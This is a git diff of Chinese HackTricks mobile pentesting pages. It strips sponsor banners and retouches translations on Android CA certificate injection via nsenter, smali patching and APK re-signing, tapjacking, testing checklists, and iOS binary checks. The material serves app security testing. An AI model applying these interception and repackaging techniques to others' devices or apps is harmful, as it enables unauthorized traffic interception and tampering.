**将更改应用于正在运行的应用程序**:要将更改应用于已经运行的应用程序,再次使用 `nsenter` 进入每个应用程序的命名空间,并执行类似的绑定挂载。必要的命令是: ```bash nsenter --mount=/proc/$APP_PID/ns/mnt -- /bin/mount --bind /system/etc/security/cacerts /apex/com.android.conscrypt/cacerts ``` @@ -141,8 +138,5 @@ nsenter --mount=/proc/$APP_PID/ns/mnt -- /bin/mount --bind /system/etc/security/ - [https://httptoolkit.com/blog/android-14-install-system-ca-certificate/](https://httptoolkit.com/blog/android-14-install-system-ca-certificate/) -
- -{% embed url="https://websec.nl/" %} {{#include ../../banners/hacktricks-training.md}} diff --git a/src/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md b/src/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md index 02b89f2f3..14bd8de2d 100644 --- a/src/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md +++ b/src/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md @@ -2,55 +2,43 @@ {{#include ../../banners/hacktricks-training.md}} -
- -通过8kSec Academy深化您在**移动安全**方面的专业知识。通过我们的自学课程掌握iOS和Android安全并获得认证: - -{% embed url="https://academy.8ksec.io/" %} - **更多信息请查看:** [**https://maddiestone.github.io/AndroidAppRE/reversing_native_libs.html**](https://maddiestone.github.io/AndroidAppRE/reversing_native_libs.html) -Android应用可以使用本地库,通常用C或C++编写,以执行性能关键的任务。恶意软件创建者也使用这些库,因为它们比DEX字节码更难以反向工程。该部分强调针对Android的反向工程技能,而不是教授汇编语言。提供ARM和x86版本的库以确保兼容性。 +Android 应用可以使用本地库,通常用 C 或 C++ 编写,以满足性能关键任务的需求。恶意软件创建者也使用这些库,因为它们比 DEX 字节码更难以反向工程。该部分强调针对 Android 的反向工程技能,而不是教授汇编语言。提供了 ARM 和 x86 版本的库以确保兼容性。 ### 关键点: -- **Android应用中的本地库:** +- **Android 应用中的本地库:** - 用于性能密集型任务。 -- 用C或C++编写,使反向工程具有挑战性。 -- 以`.so`(共享对象)格式存在,类似于Linux二进制文件。 +- 用 C 或 C++ 编写,使反向工程具有挑战性。 +- 以 `.so`(共享对象)格式存在,类似于 Linux 二进制文件。 - 恶意软件创建者更喜欢本地代码以增加分析难度。 -- **Java本地接口(JNI)和Android NDK:** -- JNI允许在本地代码中实现Java方法。 -- NDK是用于编写本地代码的Android特定工具集。 -- JNI和NDK将Java(或Kotlin)代码与本地库连接起来。 +- **Java 本地接口(JNI)和 Android NDK:** +- JNI 允许在本地代码中实现 Java 方法。 +- NDK 是一组特定于 Android 的工具,用于编写本地代码。 +- JNI 和 NDK 将 Java(或 Kotlin)代码与本地库连接起来。 - **库加载与执行:** -- 使用`System.loadLibrary`或`System.load`将库加载到内存中。 -- 在加载库时执行JNI_OnLoad。 -- Java声明的本地方法链接到本地函数,从而启用执行。 -- **将Java方法链接到本地函数:** +- 使用 `System.loadLibrary` 或 `System.load` 将库加载到内存中。 +- 在库加载时执行 JNI_OnLoad。 +- Java 声明的本地方法链接到本地函数,从而实现执行。 +- **将 Java 方法链接到本地函数:** - **动态链接:** 本地库中的函数名称匹配特定模式,允许自动链接。 -- **静态链接:** 使用`RegisterNatives`进行链接,提供函数命名和结构的灵活性。 +- **静态链接:** 使用 `RegisterNatives` 进行链接,提供函数命名和结构的灵活性。 - **反向工程工具和技术:** -- Ghidra和IDA Pro等工具有助于分析本地库。 -- `JNIEnv`对于理解JNI函数和交互至关重要。 +- Ghidra 和 IDA Pro 等工具有助于分析本地库。 +- `JNIEnv` 对理解 JNI 函数和交互至关重要。 - 提供练习以实践加载库、链接方法和识别本地函数。 ### 资源: -- **学习ARM汇编:** +- **学习 ARM 汇编:** - 建议深入了解底层架构。 -- 推荐Azeria Labs的[ARM汇编基础](https://azeria-labs.com/writing-arm-assembly-part-1/)。 -- **JNI和NDK文档:** -- [Oracle的JNI规范](https://docs.oracle.com/javase/7/docs/technotes/guides/jni/spec/jniTOC.html) -- [Android的JNI提示](https://developer.android.com/training/articles/perf-jni) -- [开始使用NDK](https://developer.android.com/ndk/guides/) +- 推荐 [ARM Assembly Basics](https://azeria-labs.com/writing-arm-assembly-part-1/) 来自 Azeria Labs。 +- **JNI 和 NDK 文档:** +- [Oracle 的 JNI 规范](https://docs.oracle.com/javase/7/docs/technotes/guides/jni/spec/jniTOC.html) +- [Android 的 JNI 提示](https://developer.android.com/training/articles/perf-jni) +- [开始使用 NDK](https://developer.android.com/ndk/guides/) - **调试本地库:** -- [使用JEB反编译器调试Android本地库](https://medium.com/@shubhamsonani/how-to-debug-android-native-libraries-using-jeb-decompiler-eec681a22cf3) - -
- -通过8kSec Academy深化您在**移动安全**方面的专业知识。通过我们的自学课程掌握iOS和Android安全并获得认证: - -{% embed url="https://academy.8ksec.io/" %} +- [使用 JEB 反编译器调试 Android 本地库](https://medium.com/@shubhamsonani/how-to-debug-android-native-libraries-using-jeb-decompiler-eec681a22cf3) {{#include ../../banners/hacktricks-training.md}} diff --git a/src/mobile-pentesting/android-app-pentesting/smali-changes.md b/src/mobile-pentesting/android-app-pentesting/smali-changes.md index d40b56fdf..eb1ceb9c0 100644 --- a/src/mobile-pentesting/android-app-pentesting/smali-changes.md +++ b/src/mobile-pentesting/android-app-pentesting/smali-changes.md @@ -2,25 +2,19 @@ {{#include ../../banners/hacktricks-training.md}} -
- -通过8kSec Academy深化您在**移动安全**方面的专业知识。通过我们的自学课程掌握iOS和Android安全并获得认证: - -{% embed url="https://academy.8ksec.io/" %} - -有时修改应用程序代码以访问隐藏信息(可能是经过良好混淆的密码或标志)是很有趣的。然后,反编译apk、修改代码并重新编译可能会很有趣。 +有时修改应用程序代码以访问隐藏信息(可能是经过良好混淆的密码或标志)是很有趣的。然后,反编译apk,修改代码并重新编译可能会很有趣。 **操作码参考:** [http://pallergabor.uw.hu/androidblog/dalvik_opcodes.html](http://pallergabor.uw.hu/androidblog/dalvik_opcodes.html) ## 快速方法 -使用**Visual Studio Code**和[APKLab](https://github.com/APKLab/APKLab)扩展,您可以**自动反编译**、修改、**重新编译**、签名并安装应用程序,而无需执行任何命令。 +使用 **Visual Studio Code** 和 [APKLab](https://github.com/APKLab/APKLab) 扩展,您可以 **自动反编译**、修改、**重新编译**、签名并安装应用程序,而无需执行任何命令。 -另一个大大简化此任务的**脚本**是[**https://github.com/ax/apk.sh**](https://github.com/ax/apk.sh) +另一个大大简化此任务的 **脚本** 是 [**https://github.com/ax/apk.sh**](https://github.com/ax/apk.sh) ## 反编译APK -使用APKTool,您可以访问**smali代码和资源**: +使用APKTool,您可以访问 **smali代码和资源**: ```bash apktool d APP.apk ``` @@ -50,11 +44,11 @@ apktool d APP.apk ```bash apktool b . #In the folder generated when you decompiled the application ``` -它将**编译**新的APK**在**_**dist**_文件夹内。 +它将**编译**新的APK**在**_**dist**_文件夹中。 如果**apktool**抛出**错误**,请尝试[安装**最新版本**](https://ibotpeaches.github.io/Apktool/install/) -### **签署新的APK** +### **签名新的APK** 然后,您需要**生成一个密钥**(系统会要求您输入密码和一些您可以随机填写的信息): ```bash @@ -66,14 +60,14 @@ jarsigner -keystore key.jks path/to/dist/* ``` ### 优化新应用程序 -**zipalign** 是一个归档对齐工具,为 Android 应用程序 (APK) 文件提供重要的优化。[More information here](https://developer.android.com/studio/command-line/zipalign). +**zipalign** 是一个归档对齐工具,为 Android 应用程序 (APK) 文件提供重要的优化。[更多信息在这里](https://developer.android.com/studio/command-line/zipalign)。 ```bash zipalign [-f] [-v] infile.apk outfile.apk zipalign -v 4 infile.apk ``` ### **再次签署新的APK(再一次?)** -如果您**更喜欢**使用 [**apksigner**](https://developer.android.com/studio/command-line/) 而不是 jarsigner,**您应该在应用** zipalign **优化后签署apk**。但请注意,您只需**使用 jarsigner 签署应用一次**(在 zipalign 之前)或使用 aspsigner(在 zipalign 之后)。 +如果您**更喜欢**使用 [**apksigner**](https://developer.android.com/studio/command-line/) 而不是 jarsigner,**您应该在应用** zipaling **优化后签署apk**。但请注意,您只需**使用 jarsigner 签署应用一次**(在 zipalign 之前)或使用 aspsigner(在 zipaling 之后)。 ```bash apksigner sign --ks key.jks ./dist/mycompiled.apk ``` @@ -145,15 +139,15 @@ invoke-static {v5, v1}, Landroid/util/Log;->d(Ljava/lang/String;Ljava/lang/Strin ``` 建议: -- 如果您打算在函数内部使用声明的变量(声明的 v0,v1,v2...),请将这些行放在 _.local \_ 和变量声明 (_const v0, 0x1_) 之间。 +- 如果您打算在函数内部使用声明的变量(声明 v0,v1,v2...),请将这些行放在 _.local \_ 和变量声明 (_const v0, 0x1_) 之间。 - 如果您想在函数的代码中间放置日志记录代码: - 将声明的变量数量加 2:例如,从 _.locals 10_ 到 _.locals 12_。 - 新变量应为已声明变量的下一个数字(在此示例中应为 _v10_ 和 _v11_,请记住它从 v0 开始)。 - - 更改日志记录函数的代码,并使用 _v10_ 和 _v11_ 代替 _v5_ 和 _v1_。 + - 更改日志记录函数的代码,并使用 _v10_ 和 _v11_ 替代 _v5_ 和 _v1_。 ### Toasting -请记得在函数开头将 _.locals 的数量加 3。 +请记得在函数开始时将 _.locals 的数量加 3。 此代码准备插入到 **函数的中间**(**根据需要更改** **变量** 的 **数量**)。它将获取 **this.o** 的 **值**,**转换** 为 **String**,然后 **制作** 一个 **toast** 以显示其值。 ```bash @@ -167,10 +161,4 @@ invoke-static {p0, v11, v12}, Landroid/widget/Toast;->makeText(Landroid/content/ move-result-object v12 invoke-virtual {v12}, Landroid/widget/Toast;->show()V ``` -
- -通过8kSec Academy深化您在**移动安全**方面的专业知识。通过我们的自学课程掌握iOS和Android安全并获得认证: - -{% embed url="https://academy.8ksec.io/" %} - {{#include ../../banners/hacktricks-training.md}} diff --git a/src/mobile-pentesting/android-app-pentesting/tapjacking.md b/src/mobile-pentesting/android-app-pentesting/tapjacking.md index bad0c9371..8fe8da8ec 100644 --- a/src/mobile-pentesting/android-app-pentesting/tapjacking.md +++ b/src/mobile-pentesting/android-app-pentesting/tapjacking.md @@ -2,18 +2,14 @@ {{#include ../../banners/hacktricks-training.md}} -
- -{% embed url="https://websec.nl/" %} - ## **基本信息** -**Tapjacking** 是一种攻击,其中 **恶意** **应用程序** 被启动并 **位于受害者应用程序的顶部**。一旦它明显遮挡了受害者应用程序,其用户界面被设计成能够欺骗用户与之互动,同时将互动传递给受害者应用程序。\ +**Tapjacking** 是一种攻击,其中 **恶意** **应用程序** 被启动并 **定位在受害者应用程序的顶部**。一旦它明显遮挡了受害者应用程序,其用户界面被设计成欺骗用户与之互动,同时将互动传递给受害者应用程序。\ 实际上,它是 **让用户无法知道他们实际上是在对受害者应用程序执行操作**。 ### 检测 -为了检测易受此攻击的应用程序,您应该在 Android 清单中搜索 **导出活动**(请注意,带有意图过滤器的活动默认情况下会自动导出)。一旦找到导出活动,**检查它们是否需要任何权限**。这是因为 **恶意应用程序也需要该权限**。 +为了检测易受此攻击的应用程序,您应该在 Android 清单中搜索 **导出活动**(请注意,带有 intent-filter 的活动默认情况下会自动导出)。一旦找到导出活动,**检查它们是否需要任何权限**。这是因为 **恶意应用程序也需要该权限**。 ### 保护 @@ -23,7 +19,7 @@ #### `filterTouchesWhenObscured` -如果 **`android:filterTouchesWhenObscured`** 设置为 **`true`**,则当视图的窗口被另一个可见窗口遮挡时,`View` 将不会接收触摸。 +如果 **`android:filterTouchesWhenObscured`** 设置为 **`true`**,则 `View` 在视图窗口被另一个可见窗口遮挡时将不会接收触摸。 #### **`setFilterTouchesWhenObscured`** @@ -54,16 +50,13 @@ android:filterTouchesWhenObscured="true"> > [!CAUTION] > 看起来这个项目现在不再维护,这个功能也不再正常工作 -你可以使用 [**qark**](https://github.com/linkedin/qark) 和 `--exploit-apk` --sdk-path `/Users/username/Library/Android/sdk` 参数来创建一个恶意应用程序,以测试可能的 **Tapjacking** 漏洞。 +你可以使用 [**qark**](https://github.com/linkedin/qark) 和 `--exploit-apk` --sdk-path `/Users/username/Library/Android/sdk` 参数来创建一个恶意应用程序,以测试可能的 **Tapjacking** 漏洞。\ -缓解措施相对简单,因为开发者可以选择在视图被其他视图覆盖时不接收触摸事件。使用 [Android 开发者参考](https://developer.android.com/reference/android/view/View#security): +缓解措施相对简单,因为开发者可以选择在视图被另一个视图覆盖时不接收触摸事件。使用 [Android 开发者参考](https://developer.android.com/reference/android/view/View#security): -> 有时,应用程序能够验证某个操作是在用户的充分了解和同意下进行的,这一点至关重要,例如授予权限请求、进行购买或点击广告。不幸的是,恶意应用程序可能会试图欺骗用户在不知情的情况下执行这些操作,通过隐藏视图的预期目的。作为补救措施,框架提供了一种触摸过滤机制,可以用来提高提供敏感功能访问的视图的安全性。 +> 有时,应用程序能够验证某个操作是在用户充分了解和同意的情况下进行的,这一点至关重要,例如授予权限请求、进行购买或点击广告。不幸的是,恶意应用程序可能会试图欺骗用户在不知情的情况下执行这些操作,通过掩盖视图的预期目的。作为补救措施,框架提供了一种触摸过滤机制,可以用来提高提供敏感功能访问的视图的安全性。 > > 要启用触摸过滤,请调用 [`setFilterTouchesWhenObscured(boolean)`](https://developer.android.com/reference/android/view/View#setFilterTouchesWhenObscured%28boolean%29) 或将 android:filterTouchesWhenObscured 布局属性设置为 true。当启用时,框架将丢弃在视图的窗口被另一个可见窗口遮挡时接收到的触摸。因此,当吐司、对话框或其他窗口出现在视图的窗口上方时,视图将不会接收到触摸。 -
- -{% embed url="https://websec.nl/" %} {{#include ../../banners/hacktricks-training.md}} diff --git a/src/mobile-pentesting/android-checklist.md b/src/mobile-pentesting/android-checklist.md index 4e264e991..482acc020 100644 --- a/src/mobile-pentesting/android-checklist.md +++ b/src/mobile-pentesting/android-checklist.md @@ -2,13 +2,8 @@ {{#include ../banners/hacktricks-training.md}} -
-通过 8kSec 学院深化您在 **移动安全** 方面的专业知识。通过我们的自学课程掌握 iOS 和 Android 安全并获得认证: - -{% embed url="https://academy.8ksec.io/" %} - -### [学习 Android 基础](android-app-pentesting/#2-android-application-fundamentals) +### [学习 Android 基础知识](android-app-pentesting/#2-android-application-fundamentals) - [ ] [基础知识](android-app-pentesting/#fundamentals-review) - [ ] [Dalvik & Smali](android-app-pentesting/#dalvik--smali) @@ -28,8 +23,8 @@ - [ ] 检查是否使用了 [混淆](android-checklist.md#some-obfuscation-deobfuscation-information),检查手机是否已被 root,是否使用了模拟器以及反篡改检查。[阅读更多信息](android-app-pentesting/#other-checks)。 - [ ] 敏感应用程序(如银行应用)应检查手机是否已被 root,并应采取相应措施。 -- [ ] 搜索 [有趣的字符串](android-app-pentesting/#looking-for-interesting-info)(密码、URL、API、加密、后门、令牌、蓝牙 UUID...)。 -- [ ] 特别注意 [firebase](android-app-pentesting/#firebase) API。 +- [ ] 搜索 [有趣的字符串](android-app-pentesting/#looking-for-interesting-info)(密码、URL、API、加密、后门、令牌、蓝牙 UUID 等)。 +- [ ] 特别关注 [firebase](android-app-pentesting/#firebase) API。 - [ ] [阅读清单:](android-app-pentesting/#basic-understanding-of-the-application-manifest-xml) - [ ] 检查应用程序是否处于调试模式并尝试“利用”它 - [ ] 检查 APK 是否允许备份 @@ -41,12 +36,12 @@ - [ ] 应用程序是否 [不安全地内部或外部保存数据](android-app-pentesting/#insecure-data-storage)? - [ ] 是否有任何 [密码硬编码或保存在磁盘上](android-app-pentesting/#poorkeymanagementprocesses)?应用程序是否 [使用不安全的加密算法](android-app-pentesting/#useofinsecureandordeprecatedalgorithms)? - [ ] 所有库是否使用 PIE 标志编译? -- [ ] 不要忘记有一堆 [静态 Android 分析工具](android-app-pentesting/#automatic-analysis) 可以在此阶段帮助您。 +- [ ] 不要忘记有一堆 [静态 Android 分析工具](android-app-pentesting/#automatic-analysis) 可以在此阶段帮助你。 ### [动态分析](android-app-pentesting/#dynamic-analysis) - [ ] 准备环境([在线](android-app-pentesting/#online-dynamic-analysis),[本地 VM 或物理](android-app-pentesting/#local-dynamic-analysis)) -- [ ] 是否存在 [意外的数据泄露](android-app-pentesting/#unintended-data-leakage)(日志记录、复制/粘贴、崩溃日志)? +- [ ] 是否有任何 [意外的数据泄露](android-app-pentesting/#unintended-data-leakage)(日志记录、复制/粘贴、崩溃日志)? - [ ] [机密信息是否保存在 SQLite 数据库中](android-app-pentesting/#sqlite-dbs)? - [ ] [可利用的暴露活动](android-app-pentesting/#exploiting-exported-activities-authorisation-bypass)? - [ ] [可利用的内容提供者](android-app-pentesting/#exploiting-content-providers-accessing-and-manipulating-sensitive-information)? @@ -54,18 +49,13 @@ - [ ] [可利用的广播接收器](android-app-pentesting/#exploiting-broadcast-receivers)? - [ ] 应用程序是否 [以明文传输信息/使用弱算法](android-app-pentesting/#insufficient-transport-layer-protection)?是否可能发生中间人攻击? - [ ] [检查 HTTP/HTTPS 流量](android-app-pentesting/#inspecting-http-traffic) -- [ ] 这一点非常重要,因为如果您可以捕获 HTTP 流量,您可以搜索常见的 Web 漏洞(Hacktricks 有很多关于 Web 漏洞的信息)。 -- [ ] 检查可能的 [Android 客户端侧注入](android-app-pentesting/#android-client-side-injections-and-others)(可能一些静态代码分析会在这里提供帮助) -- [ ] [Frida](android-app-pentesting/#frida):仅使用 Frida,利用它从应用程序中获取有趣的动态数据(也许一些密码...) +- [ ] 这一点非常重要,因为如果你能捕获 HTTP 流量,你可以搜索常见的 Web 漏洞(Hacktricks 有很多关于 Web 漏洞的信息)。 +- [ ] 检查可能的 [Android 客户端侧注入](android-app-pentesting/#android-client-side-injections-and-others)(可能一些静态代码分析会在这里有所帮助) +- [ ] [Frida](android-app-pentesting/#frida):仅使用 Frida,从应用程序中获取有趣的动态数据(也许一些密码...) ### 一些混淆/去混淆信息 - [ ] [在这里阅读](android-app-pentesting/#obfuscating-deobfuscating-code) -
- -通过 8kSec 学院深化您在 **移动安全** 方面的专业知识。通过我们的自学课程掌握 iOS 和 Android 安全并获得认证: - -{% embed url="https://academy.8ksec.io/" %} {{#include ../banners/hacktricks-training.md}} diff --git a/src/mobile-pentesting/ios-pentesting-checklist.md b/src/mobile-pentesting/ios-pentesting-checklist.md index b564c6e13..99d926f37 100644 --- a/src/mobile-pentesting/ios-pentesting-checklist.md +++ b/src/mobile-pentesting/ios-pentesting-checklist.md @@ -1,20 +1,12 @@ # iOS Pentesting Checklist -
- -\ -使用 [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) 轻松构建和 **自动化工作流程**,由世界上 **最先进** 的社区工具提供支持。\ -立即获取访问权限: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} - {{#include ../banners/hacktricks-training.md}} ### 准备 - [ ] 阅读 [**iOS 基础**](ios-pentesting/ios-basics.md) -- [ ] 准备您的环境,阅读 [**iOS 测试环境**](ios-pentesting/ios-testing-environment.md) -- [ ] 阅读 [**iOS 初步分析**](ios-pentesting/#initial-analysis) 的所有部分,以了解对 iOS 应用程序进行渗透测试的常见操作 +- [ ] 准备你的环境,阅读 [**iOS 测试环境**](ios-pentesting/ios-testing-environment.md) +- [ ] 阅读 [**iOS 初步分析**](ios-pentesting/#initial-analysis) 的所有部分,以了解对 iOS 应用进行渗透测试的常见操作 ### 数据存储 @@ -24,10 +16,10 @@ - [ ] [**Firebase**](ios-pentesting/#firebase-real-time-databases) 配置错误。 - [ ] [**Realm 数据库**](ios-pentesting/#realm-databases) 可以存储敏感信息。 - [ ] [**Couchbase Lite 数据库**](ios-pentesting/#couchbase-lite-databases) 可以存储敏感信息。 -- [ ] [**二进制 Cookie**](ios-pentesting/#cookies) 可以存储敏感信息。 -- [ ] [**缓存数据**](ios-pentesting/#cache) 可以存储敏感信息。 -- [ ] [**自动快照**](ios-pentesting/#snapshots) 可以保存视觉敏感信息。 -- [ ] [**钥匙串**](ios-pentesting/#keychain) 通常用于存储敏感信息,这些信息在转售手机时可能会被遗留。 +- [ ] [**二进制 Cookie**](ios-pentesting/#cookies) 可以存储敏感信息 +- [ ] [**缓存数据**](ios-pentesting/#cache) 可以存储敏感信息 +- [ ] [**自动快照**](ios-pentesting/#snapshots) 可以保存视觉敏感信息 +- [ ] [**钥匙串**](ios-pentesting/#keychain) 通常用于存储在转售手机时可能遗留的敏感信息。 - [ ] 总之,只需 **检查应用程序在文件系统中保存的敏感信息** ### 键盘 @@ -42,7 +34,7 @@ ### 备份 - [ ] [**备份**](ios-pentesting/#backups) 可用于 **访问文件系统中保存的敏感信息**(检查此检查表的初始点) -- [ ] 此外,[**备份**](ios-pentesting/#backups) 可用于 **修改应用程序的一些配置**,然后 **在手机上恢复** 备份,作为 **修改后的配置** 被 **加载**,某些(安全) **功能** 可能会被 **绕过** +- [ ] 此外,[**备份**](ios-pentesting/#backups) 可用于 **修改应用程序的一些配置**,然后 **在手机上恢复** 备份,作为 **修改后的配置** 被 **加载** 时,某些(安全) **功能** 可能会被 **绕过** ### **应用程序内存** @@ -56,15 +48,15 @@ ### **本地身份验证** -- [ ] 如果应用程序中使用了 [**本地身份验证**](ios-pentesting/#local-authentication),您应该检查身份验证的工作方式。 -- [ ] 如果使用的是 [**本地身份验证框架**](ios-pentesting/#local-authentication-framework),则可能很容易被绕过。 -- [ ] 如果使用的是 [**可以动态绕过的函数**](ios-pentesting/#local-authentication-using-keychain),您可以创建自定义 frida 脚本。 +- [ ] 如果应用程序使用 [**本地身份验证**](ios-pentesting/#local-authentication),你应该检查身份验证的工作方式。 +- [ ] 如果使用 [**本地身份验证框架**](ios-pentesting/#local-authentication-framework),则可能很容易被绕过 +- [ ] 如果使用 [**可以动态绕过的函数**](ios-pentesting/#local-authentication-using-keychain),你可以创建一个自定义的 frida 脚本 ### 通过 IPC 暴露敏感功能 - [**自定义 URI 处理程序 / 深度链接 / 自定义方案**](ios-pentesting/#custom-uri-handlers-deeplinks-custom-schemes) - [ ] 检查应用程序是否 **注册了任何协议/方案** -- [ ] 检查应用程序是否 **注册以使用** 任何协议/方案 +- [ ] 检查应用程序是否 **注册使用** 任何协议/方案 - [ ] 检查应用程序 **是否期望从自定义方案接收任何类型的敏感信息**,该信息可以被注册相同方案的另一个应用程序 **拦截** - [ ] 检查应用程序 **是否未检查和清理** 通过自定义方案的用户输入,某些 **漏洞可能被利用** - [ ] 检查应用程序 **是否暴露任何敏感操作**,可以通过自定义方案从任何地方调用 @@ -74,7 +66,7 @@ - [ ] 检查应用程序 **是否未检查和清理** 通过自定义方案的用户输入,某些 **漏洞可能被利用** - [ ] 检查应用程序 **是否暴露任何敏感操作**,可以通过自定义方案从任何地方调用 - [**UIActivity 共享**](ios-pentesting/ios-uiactivity-sharing.md) -- [ ] 检查应用程序是否可以接收 UIActivities,是否可以利用任何特殊构造的活动中的漏洞 +- [ ] 检查应用程序是否可以接收 UIActivities,是否可以利用任何特殊构造的活动来利用漏洞 - [**UIPasteboard**](ios-pentesting/ios-uipasteboard.md) - [ ] 检查应用程序是否 **将任何内容复制到通用剪贴板** - [ ] 检查应用程序是否 **使用通用剪贴板中的数据** @@ -84,26 +76,18 @@ - [**WebViews**](ios-pentesting/ios-webviews.md) - [ ] 检查使用的 WebViews 类型 - [ ] 检查 **`javaScriptEnabled`**、**`JavaScriptCanOpenWindowsAutomatically`**、**`hasOnlySecureContent`** 的状态 -- [ ] 检查 webview 是否可以 **访问本地文件**,协议为 **file://** **(`allowFileAccessFromFileURLs`,`allowUniversalAccessFromFileURLs`)** +- [ ] 检查 webview 是否可以 **访问本地文件**,使用协议 **file://** **(`allowFileAccessFromFileURLs`,`allowUniversalAccessFromFileURLs`)** - [ ] 检查 Javascript 是否可以访问 **Native** **方法**(`JSContext`,`postMessage`) ### 网络通信 -- [ ] 执行 [**MitM 通信**](ios-pentesting/#network-communication) 并搜索 Web 漏洞。 +- [ ] 执行 [**MitM 进行通信**](ios-pentesting/#network-communication) 并搜索 Web 漏洞。 - [ ] 检查 [**证书的主机名**](ios-pentesting/#hostname-check) 是否被检查 - [ ] 检查/绕过 [**证书钉扎**](ios-pentesting/#certificate-pinning) -### **其他** +### **杂项** - [ ] 检查 [**自动修补/更新**](ios-pentesting/#hot-patching-enforced-updateing) 机制 - [ ] 检查 [**恶意第三方库**](ios-pentesting/#third-parties) {{#include ../banners/hacktricks-training.md}} - -
- -\ -使用 [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) 轻松构建和 **自动化工作流程**,由世界上 **最先进** 的社区工具提供支持。\ -立即获取访问权限: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} diff --git a/src/mobile-pentesting/ios-pentesting/README.md b/src/mobile-pentesting/ios-pentesting/README.md index a49dbcc8f..1a0f72ded 100644 --- a/src/mobile-pentesting/ios-pentesting/README.md +++ b/src/mobile-pentesting/ios-pentesting/README.md @@ -1,34 +1,26 @@ # iOS Pentesting -
- -\ -使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=ios-pentesting) 轻松构建和 **自动化工作流程**,由世界上 **最先进** 的社区工具提供支持。\ -今天就获取访问权限: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=ios-pentesting" %} - {{#include ../../banners/hacktricks-training.md}} -## iOS 基础 +## iOS Basics {{#ref}} ios-basics.md {{#endref}} -## 测试环境 +## Testing Environment -在此页面中,您可以找到有关 **iOS 模拟器**、**模拟器** 和 **越狱** 的信息: +在此页面中,您可以找到有关 **iOS 模拟器**、**仿真器** 和 **越狱** 的信息: {{#ref}} ios-testing-environment.md {{#endref}} -## 初步分析 +## Initial Analysis -### 基本 iOS 测试操作 +### Basic iOS Testing Operations -在测试过程中 **将建议进行几项操作**(连接设备、读/写/上传/下载文件、使用一些工具...)。因此,如果您不知道如何执行这些操作,请 **开始阅读此页面**: +在测试过程中 **将建议进行几项操作**(连接到设备、读/写/上传/下载文件、使用一些工具...)。因此,如果您不知道如何执行这些操作,请 **开始阅读此页面**: {{#ref}} basic-ios-testing-operations.md @@ -38,34 +30,39 @@ basic-ios-testing-operations.md > 对于以下步骤 **应用程序应已安装** 在设备上,并且应已获得 **IPA 文件**。\ > 阅读 [Basic iOS Testing Operations](basic-ios-testing-operations.md) 页面以了解如何执行此操作。 -### 基本静态分析 +### Basic Static Analysis + +一些有趣的 iOS - IPA 文件反编译工具: + +- https://github.com/LaurieWired/Malimite +- https://ghidra-sre.org/ 建议使用工具 [**MobSF**](https://github.com/MobSF/Mobile-Security-Framework-MobSF) 对 IPA 文件进行自动静态分析。 识别 **二进制文件中存在的保护**: -- **PIE (位置无关可执行文件)**:启用时,应用程序每次启动时加载到随机内存地址,使其初始内存地址更难预测。 +- **PIE (Position Independent Executable)**:启用时,应用程序每次启动时加载到随机内存地址,使其初始内存地址更难预测。 ```bash otool -hv | grep PIE # 应该包含 PIE 标志 ``` -- **栈金丝雀**:为了验证栈的完整性,在调用函数之前将一个“金丝雀”值放置在栈上,并在函数结束时再次验证。 +- **Stack Canaries**:为了验证栈的完整性,在调用函数之前将一个“金丝雀”值放置在栈上,并在函数结束时再次验证。 ```bash otool -I -v | grep stack_chk # 应该包含符号:stack_chk_guard 和 stack_chk_fail ``` -- **ARC (自动引用计数)**:防止常见的内存损坏缺陷 +- **ARC (Automatic Reference Counting)**:防止常见的内存损坏缺陷 ```bash otool -I -v | grep objc_release # 应该包含 _objc_release 符号 ``` -- **加密二进制文件**:二进制文件应已加密 +- **Encrypted Binary**:二进制文件应被加密 ```bash -otool -arch all -Vl | grep -A5 LC_ENCRYPT # 加密标志应为 1 +otool -arch all -Vl | grep -A5 LC_ENCRYPT # cryptid 应该为 1 ``` **识别敏感/不安全函数** @@ -136,13 +133,13 @@ grep -iER "_printf" grep -iER "_vsprintf" ``` -### 基本动态分析 +### Basic Dynamic Analysis -查看 [**MobSF**](https://github.com/MobSF/Mobile-Security-Framework-MobSF) 执行的动态分析。您需要浏览不同的视图并与之互动,但它将在执行其他操作时挂钩多个类,并在完成后准备报告。 +查看 [**MobSF**](https://github.com/MobSF/Mobile-Security-Framework-MobSF) 执行的动态分析。您需要浏览不同的视图并与之交互,但它将在执行其他操作时挂钩多个类,并在完成后准备报告。 -### 列出已安装的应用 +### Listing Installed Apps -使用命令 `frida-ps -Uai` 确定已安装应用的 **包标识符**: +使用命令 `frida-ps -Uai` 来确定已安装应用程序的 **bundle identifier**: ```bash $ frida-ps -Uai PID Name Identifier @@ -189,7 +186,7 @@ ios-hooking-with-objection.md ```bash $ plutil -convert xml1 Info.plist ``` -- **对于 Linux**: +- **对于Linux**: ```bash $ apt install libplist-utils $ plistutil -i Info.plist -o Info_xml.plist @@ -200,14 +197,14 @@ $ grep -i Info.plist ``` **数据路径** -在 iOS 环境中,目录专门为 **系统应用** 和 **用户安装的应用** 指定。系统应用位于 `/Applications` 目录下,而用户安装的应用则放置在 `/var/mobile/containers/Data/Application/` 下。这些应用被分配一个称为 **128-bit UUID** 的唯一标识符,使得手动定位应用文件夹的任务因目录名称的随机性而变得具有挑战性。 +在 iOS 环境中,目录专门为 **系统应用程序** 和 **用户安装的应用程序** 指定。系统应用程序位于 `/Applications` 目录下,而用户安装的应用程序则放置在 `/var/mobile/containers/Data/Application/` 下。这些应用程序被分配一个称为 **128-bit UUID** 的唯一标识符,使得手动定位应用程序文件夹的任务因目录名称的随机性而变得具有挑战性。 > [!WARNING] -> 由于 iOS 中的应用必须被沙盒化,每个应用在 **`$HOME/Library/Containers`** 中也会有一个以应用的 **`CFBundleIdentifier`** 作为文件夹名称的文件夹。 +> 由于 iOS 中的应用程序必须被沙盒化,每个应用程序在 **`$HOME/Library/Containers`** 中也会有一个以应用程序的 **`CFBundleIdentifier`** 作为文件夹名称的文件夹。 > > 